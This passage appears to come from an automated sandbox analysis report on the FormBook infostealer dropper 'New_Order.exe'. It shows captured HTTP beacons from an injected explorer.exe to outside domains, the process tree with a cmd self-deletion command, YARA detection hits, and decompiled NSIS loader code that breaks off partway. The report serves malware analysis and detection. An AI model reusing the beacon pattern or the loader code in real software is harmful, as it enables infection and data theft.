                                                                      May 12, 2021 06:11:13.647696972 CEST1339INData Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65
                                                                      Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
                                                                      May 12, 2021 06:11:13.647722960 CEST1340INData Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65
                                                                      Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                      May 12, 2021 06:11:13.647748947 CEST1341INData Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95
                                                                      Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
                                                                      May 12, 2021 06:11:13.647768021 CEST1342INData Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c
                                                                      Data Ascii: s = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //
                                                                      May 12, 2021 06:11:13.648022890 CEST1342INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.54972085.233.160.2280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:18.796605110 CEST1343OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1
                                                                      Host: www.websitemax.co.uk
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:18.849797010 CEST1344INHTTP/1.1 200 OK
                                                                      Date: Wed, 12 May 2021 04:11:18 GMT
                                                                      Server: Apache
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 31 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 62 6f 64 79 2c 20 68 74 6d 6c 0a 09 7b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 7d 0a 09 23 63 6f 6e 74 65 6e 74 0a 09 7b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 20 30 3b 20 72 69 67 68 74 3a 20 30 3b 20 62 6f 74 74 6f 6d 3a 20 30 3b 20 74 6f 70 3a 20 30 70 78 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 3c 69 66 72 61 6d 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 63 6e 2e 63 6f 6d 2f 70 61 72 6b 65 64 2d 64 6f 6d 61 69 6e 73 2f 69 6e 64 65 78 3f 2f 3d 2f 64 6f 6d 61 69 6e 2f 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1e9<!DOCTYPE html><html><head><title>websitemax.co.uk</title><style type="text/css">body, html{margin: 0; padding: 0; height: 100%; overflow: hidden;}#content{position:absolute; left: 0; right: 0; bottom: 0; top: 0px;}</style><meta name="robots" content="noindex, nofollow"></head><body><div id="content"><iframe width="100%" height="100%" frameborder="0" src="https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk"></iframe></div></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.549724150.95.255.3880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:24.480335951 CEST2828OUTGET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.year-action.xyz
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:24.793498039 CEST3343INHTTP/1.1 302 Found
                                                                      Date: Wed, 12 May 2021 04:11:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                      Location: http://dfltweb1.onamae.com
                                                                      Content-Length: 210
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.5497258.210.40.4980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:30.171286106 CEST5182OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1
                                                                      Host: www.hdjakdhf.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:30.448025942 CEST5182INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Wed, 12 May 2021 04:11:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:45.772072077 CEST5217OUTGET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.susanestuart.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:45.909532070 CEST5217INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: New_Order.exe PID: 6216 Parent PID: 5672

                                                                      General

                                                                      Start time:06:09:42
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\New_Order.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x400000
                                                                      File size:344003 bytes
                                                                      MD5 hash:74E4EB9AFBF8F9C9B285A46CED831979
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: svchost.exe PID: 6252 Parent PID: 6216

                                                                      General

                                                                      Start time:06:09:43
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x180000
                                                                      File size:44520 bytes
                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 6252

                                                                      General

                                                                      Start time:06:09:48
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: wscript.exe PID: 6712 Parent PID: 3472

                                                                      General

                                                                      Start time:06:10:01
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                      Imagebase:0x1260000
                                                                      File size:147456 bytes
                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: cmd.exe PID: 6816 Parent PID: 6712

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\SysWOW64\svchost.exe'
                                                                      Imagebase:0x290000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: conhost.exe PID: 6848 Parent PID: 6816

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Analysis Process: New_Order.exe PID: 6216 Parent PID: 5672 New_Order.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t119 = E00406500(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406492(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060F7("Lat Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\New_Order.exe\" ";
				E004060F7(_t160, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\New_Order.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403317(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403830();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t63 =  *0x42f4ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406500(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t153 = E00405ABA(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040577E(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
														}
														E004060F7(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\New_Order.exe", 0x429450, 1) != 0) {
																E00405ED6(_t137, 0x429450, 0);
																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t94 = E00405796(0x429450);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405ED6(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B7D(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403317(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403317(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
